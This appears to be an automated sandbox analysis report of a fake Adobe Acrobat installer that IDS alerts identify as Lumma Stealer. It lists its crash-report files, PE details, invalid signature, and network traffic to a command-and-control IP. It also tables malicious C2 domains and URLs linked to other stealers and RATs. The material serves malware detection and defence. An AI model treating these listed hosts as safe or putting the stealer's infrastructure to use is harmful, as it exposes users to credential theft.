Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
10:14:22	API Interceptor	8x Sleep call for process: Adobe-Acrobat-Pro-2025.exe modified
10:14:36	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.80.1	NursultanAlphaCrack.bat.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	237025cm.n9shteam.in/UpdatesqlCdn.php
	QsBdpe1gK5.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.masterqq.pro/vfw3/
	NFhRxwbegd.exe	Get hash	malicious	FormBook	Browse	www.aziziyeescortg.xyz/2pcx/
	qlG7x91YXH.exe	Get hash	malicious	FormBook	Browse	www.mzkd6gp5.top/0hqe/
	6uHfmjGMfL.exe	Get hash	malicious	Amadey	Browse	clientservices.sgoogleapis.observer/api/index.php
	http://l.instagram.com/?0bfd7a413579bfc47b11c1f19890162e=f171d759fb3a033e4eb430517cad3aef&e=ATP3gbWvTZYJbEDeh7rUkhPx4FjctqZcqx8JLHQOt3eCFNBI8ssZ853B2RmMWetLJ63KaZJU&s=1&u=https%3A%2F%2Fbusiness.instagram.com%2Fmicro_site%2Furl%2F%3Fevent_type%3Dclick%26site%3Digb%26destination%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fig_redirect%252F%253Fd%253DAd8U5WMN2AM7K-NrvRBs3gyfr9DHeZ3ist33ENX9eJBJWMRBAaOOij4rbjtu42P4dXhL8YyD-jl0LZtS1wkFu-DRtZrPI1zyuzAYXXYv3uJfsc2GuuhHJZr0iVcLluY7-XzYStW8tPCtY7q5OaN0ZR5NezqONJHNCe212u1Fk3V5I6c8mMsj53lfF9nQIFCpMtE%2526a%253D1%2526hash%253DAd_y5usHyEC86F8X	Get hash	malicious	Unknown	Browse	my.cradaygo.com/smmylet
	SW_48912.scr.exe	Get hash	malicious	FormBook	Browse	www.dejikenkyu.cyou/pmpa/
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	hiranetwork.com/administrator/index.php
	downloader2.hta	Get hash	malicious	XWorm	Browse	2k8u3.org/wininit.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
sobrattyeu.bond	random.exe	Get hash	malicious	LummaC	Browse	104.21.96.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	xd.x86.elf	Get hash	malicious	Mirai	Browse	1.13.159.139
	setup.msi	Get hash	malicious	Unknown	Browse	188.114.96.3
	Qj9gUbJBkY.dll	Get hash	malicious	Wannacry	Browse	8.44.41.1
	xd.spc.elf	Get hash	malicious	Mirai	Browse	172.69.125.196
	http://www.mcpf.co.za	Get hash	malicious	Unknown	Browse	104.17.25.14
	MotivatedFunded.exe	Get hash	malicious	LummaC Stealer	Browse	162.159.135.233
	Set-Up.exe	Get hash	malicious	LummaC	Browse	104.21.75.15
	http://www.mcpf.co.za	Get hash	malicious	Unknown	Browse	104.17.25.14
	ActiVe_Ver_Set-UpFilE.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.192.161
	Personliche Nachricht fur e4060738.pdf	Get hash	malicious	Unknown	Browse	104.18.95.41

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	MotivatedFunded.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
	Set-Up.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	ActiVe_Ver_Set-UpFilE.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1
	00.ps1	Get hash	malicious	PureCrypter, LummaC, LummaC Stealer	Browse	104.21.80.1
	00.ps1	Get hash	malicious	PureCrypter, LummaC, LummaC Stealer	Browse	104.21.80.1
	138745635-72645747.116.exe	Get hash	malicious	Unknown	Browse	104.21.80.1
	92.255.57_1.112.ps1	Get hash	malicious	LummaC	Browse	104.21.80.1
	2834573-3676874985.02.exe	Get hash	malicious	Unknown	Browse	104.21.80.1
	62.122.184.98 (3).ps1	Get hash	malicious	LummaC	Browse	104.21.80.1

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Adobe-Acrobat-Pr_34e0e0c6aac799108c673a33397bb48b249f7_eb91d539_00a5090a-d55f-4cdc-81ec-93f0a05e8dbd\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9029053895822463
Encrypted:	false
SSDEEP:	96:h2FpwI4/ZsNg0HjTOAqyS3QXIDcQlc6VcEdcw3V+BHUHZ0ownOgHkEwH3dEFWv53:s7w//Z6eA0LR3EaWGzuiFxZ24IO8Ij
MD5:	D75093899227E48B93A97EB489394F18
SHA1:	658F3E6FED4E7B85430358F7A41E9FABC50A04E4
SHA-256:	0256E0CB0B7DAA98CA7418D0565D67D527310EE765340BC0CCD2103438C9886C
SHA-512:	19626E2EDC1A6D2777D9A7645C5329F765936D0B75BF5B8A6A7CC9DC5BFB2B604995BEE6E2AC01F4D98D4F55BEF5918F9B5C7CC91CB47E3AF932D00D2EDE7C7C
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.4.2.7.6.6.1.5.0.6.9.0.2.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.4.2.7.6.6.2.0.0.6.8.9.6.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.0.a.5.0.9.0.a.-.d.5.5.f.-.4.c.d.c.-.8.1.e.c.-.9.3.f.0.a.0.5.e.8.d.b.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.0.d.4.b.a.6.3.-.d.b.f.a.-.4.d.a.b.-.a.f.5.2.-.0.2.8.6.e.a.8.e.f.f.b.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.A.d.o.b.e.-.A.c.r.o.b.a.t.-.P.r.o.-.2.0.2.5...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.H.a.n.d.l.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.8.8.-.0.0.0.1.-.0.0.1.4.-.6.d.6.c.-.1.e.2.7.6.0.6.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.b.7.6.0.a.9.d.a.9.4.f.1.f.3.a.d.5.1.8.8.d.7.a.e.e.2.1.7.d.4.7.0.0.0.0.0.0.0.0.!.0.0.0.0.e.5.c.b.8.f.5.6.8.d.f.6.8.c.b.0.b.8.c.1.4.8.1.1.d.1.4.0.9.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD9A3.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed Jan 15 15:14:21 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	152967
Entropy (8bit):	3.7544493426054806
Encrypted:	false
SSDEEP:	1536:VVnNLqeTtT5Cuy19uBojRRpN4uE2aONUN9NCCDKLTgRAxMs:VVNLt5YVb94uEqq9zKLTgQ
MD5:	D58F342CA418ABB91138C17780743D8C
SHA1:	C28D3875D592293D4D1B6630C502AF03E1A45FCC
SHA-256:	A5416EB578076AE1C1EBEA9646BC48A0FFE2E26E3A2271D2494DD790893DC574
SHA-512:	CD73D41CEB077FE760787F49739A0749E4C953DA3CCDFA63272C51DC9E04621EE84F169285AB6403AFF88FEC5B8B22FC63485FC0CC73033364AF62229E45F866
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .........g....................................$................/..........`.......8...........T...........($.._1......................................................................................................eJ......P.......GenuineIntel............T.............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDACD.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8430
Entropy (8bit):	3.691486919739247
Encrypted:	false
SSDEEP:	192:R6l7wVeJOkjp6B6YEIASU98mgmfMcwVJJpr189boKsftYm:R6lXJZp6B6YEvSU98mgmfYVJ2opfX
MD5:	D12E34A4BDAE4DE11174DE1507BA3670
SHA1:	3FF8689B81B722017D76E3FE2524469A0F42BED0
SHA-256:	175A56B355B79B80B647DFDD1E683E3F8971B0083DFB1BFAD653C0DAE3C44C69
SHA-512:	89524A0FBAC76D8CE37A6021AC3DDB6C31FF9A069D9C9D35C6B5CC378C27D3714C80DB04C6EC860EA7A4B9822F162F69F51C3482ED98C27CF7F41D96CBC0C8AD
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.7.6.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDAFD.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4810
Entropy (8bit):	4.475317412479773
Encrypted:	false
SSDEEP:	48:cvIwWl8zs3Jg77aI9Q/MQWpW8VYAYm8M4JedxPcf6FQ+q8v5dxPcfbFQapZd:uIjfZI7O/Mp7VMJDfTK+fhQapZd
MD5:	F2EE16EA2C2778747035B0338423F317
SHA1:	3B0E902CFAE095444A6E169877708AEA8046E94A
SHA-256:	D9B8AC2CF2E6E6258A050B887E0F59FB5F4992976BE7FAA26595819AC04CF3CE
SHA-512:	61B39E71E1EC6AAB0FCE479D5CBBB6198AD49BAF9279524AD29C790F2C5ED14701ED25B9261CF520B04161B58982CAB9DC231288E2475A153735EDA6FF6280AD
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="677177" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.421822433085895
Encrypted:	false
SSDEEP:	6144:6Svfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNu0uhiTw:pvloTMW+EZMM6DFyc03w
MD5:	DEB486F395522EC9F10FFDE185BA036D
SHA1:	F61BABA6E85442AE881C827CDC1930768654B3BD
SHA-256:	6B39D97749B7C0124783BD84AEB461FB741ECA4D32C67A7B043F702958699FEB
SHA-512:	F0C0C5517CA5EE3B5A069C9DD43722C61A72EF7B08B387EBECB1F7F42EBF93A5E212B950F6595B2390DBDBA45BD5ACED3DE56624EFD1CE9728DC972445014C1D
Malicious:	false
Reputation:	low
Preview:	regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm*.u'`g...............................................................................................................................................................................................................................................................................................................................................Xb.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.6395734526350525
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.96% Win16/32 Executable Delphi generic (2074/23) 0.01% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Adobe-Acrobat-Pro-2025.exe
File size:	459'376 bytes
MD5:	b3eea0239b9e344a94a25d0c0c17c9d0
SHA1:	e5cb8f568df68cb0b8c14811d14096af6690c936
SHA256:	a8e028e06b6e58a256e997f803a43b68d4f1224beba4a49c490f6934addaca77
SHA512:	cb9f19c1fa57bd877f7092b825963b6160d4ec5b6914f5808d847949d84b6dc3b81f90f886d831b092beee8b335b0218aad209d916bc1b839711a3ccce2dce69
SSDEEP:	12288:nA0Wl/zueVCcPnypztZYU/fyOfEGKEMPC6vbCY:A0izXUtl/aG2EMNjCY
TLSH:	88A4E0682668D53BC2AE43B6E4A3510263F5B4D7EEA1FB45BC9414F14C12390AB352FF
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...2.................0.............>.... ... ....@.. .......................@............`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x421a3e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xECEDE332 [Sun Dec 18 02:19:30 2095 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert EV Code Signing CA (SHA2), OU=www.digicert.com, O=DigiCert Inc, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	08/10/2020 02:00:00 12/10/2023 14:00:00
Subject Chain	CN=ASUSTeK COMPUTER INC., O=ASUSTeK COMPUTER INC., L=Beitou District, S=Taipei City, C=TW, SERIALNUMBER=23638777, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=TW
Version:	3
Thumbprint MD5:	332CDC164B1324C3FF3F64E228C5FFFC
Thumbprint SHA-1:	CBFB3D25134A5FF6FCF2924D5B4BE16194EA7E13
Thumbprint SHA-256:	531855F05B9D55E4F6DDEBC443706382DDB9ACBD2B8AB24004822BE204420943
Serial:	0C9838F673F9B1CCE395CFAB2B6684E4

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x219f0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x22000	0x598	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x6dc00	0x2670	.idata
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x24000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x219a7	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x1fa44	0x1fc00	7c297cc8f463f81875ed0f7ba3dd3ff0	False	0.4013056717519685	data	5.796591200875089	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x22000	0x598	0x600	511dd0b163083f747b4fa3f1e450067c	False	0.41015625	data	4.038713703339799	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x24000	0xc	0x200	b1171333753a88cda4e7356665065f4c	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.idata	0x26000	0x4d400	0x4d400	d14cf3e6fdb9ca0e2d373d61bb5bf1c2	False	1.0003350020226538	data	7.999513650950077	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x220a0	0x30c	data			0.41923076923076924
RT_MANIFEST	0x223ac	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-15T16:14:22.280853+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49705	104.21.80.1	443	TCP
2025-01-15T16:14:22.821880+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49705	104.21.80.1	443	TCP
2025-01-15T16:14:22.821880+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49705	104.21.80.1	443	TCP
2025-01-15T16:14:23.342039+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49706	104.21.80.1	443	TCP
2025-01-15T16:14:26.946027+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49706	104.21.80.1	443	TCP
2025-01-15T16:14:26.946027+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49706	104.21.80.1	443	TCP
2025-01-15T16:14:27.594769+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49713	104.21.80.1	443	TCP
2025-01-15T16:14:28.407852+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49713	104.21.80.1	443	TCP
2025-01-15T16:14:28.912666+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49716	104.21.80.1	443	TCP
2025-01-15T16:14:33.444611+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49747	104.21.80.1	443	TCP
2025-01-15T16:14:35.079971+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49759	104.21.80.1	443	TCP
2025-01-15T16:14:39.403619+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49791	104.21.80.1	443	TCP
2025-01-15T16:14:39.412394+0100	2843864	ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2	1	192.168.2.5	49791	104.21.80.1	443	TCP
2025-01-15T16:14:42.715190+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49808	104.21.80.1	443	TCP
2025-01-15T16:14:43.210932+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49808	104.21.80.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 15, 2025 16:14:21.789355993 CET	49705	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:21.789412975 CET	443	49705	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:21.789547920 CET	49705	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:21.790781021 CET	49705	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:21.790807962 CET	443	49705	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:22.280777931 CET	443	49705	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:22.280853033 CET	49705	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:22.285535097 CET	49705	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:22.285554886 CET	443	49705	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:22.285923004 CET	443	49705	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:22.329283953 CET	49705	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:22.402611017 CET	49705	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:22.402611017 CET	49705	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:22.402782917 CET	443	49705	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:22.821901083 CET	443	49705	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:22.822014093 CET	443	49705	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:22.822175026 CET	49705	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:22.824492931 CET	49705	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:22.824547052 CET	443	49705	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:22.824580908 CET	49705	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:22.824599028 CET	443	49705	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:22.841093063 CET	49706	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:22.841123104 CET	443	49706	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:22.841195107 CET	49706	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:22.841737986 CET	49706	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:22.841748953 CET	443	49706	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:23.341917038 CET	443	49706	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:23.342039108 CET	49706	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:23.429975986 CET	49706	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:23.430007935 CET	443	49706	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:23.430769920 CET	443	49706	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:23.431993008 CET	49706	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:23.432359934 CET	49706	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:23.432395935 CET	443	49706	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:26.946026087 CET	443	49706	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:26.946316004 CET	443	49706	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:26.946357965 CET	49706	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:26.946361065 CET	443	49706	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:26.946388006 CET	443	49706	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:26.946436882 CET	49706	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:26.946444988 CET	443	49706	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:26.946475983 CET	443	49706	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:26.946523905 CET	49706	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:26.946531057 CET	443	49706	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:26.946542025 CET	443	49706	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:26.946592093 CET	49706	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:26.946599007 CET	443	49706	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:26.947061062 CET	443	49706	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:26.947108030 CET	49706	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:26.947117090 CET	443	49706	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:26.951930046 CET	443	49706	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:26.951986074 CET	49706	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:26.952004910 CET	443	49706	104.21.80.1	192.168.2.5
Jan 15, 2025 16:14:26.995718002 CET	49706	443	192.168.2.5	104.21.80.1
Jan 15, 2025 16:14:27.045778990 CET	443	49706	104.21.80.1	192.168.2.5
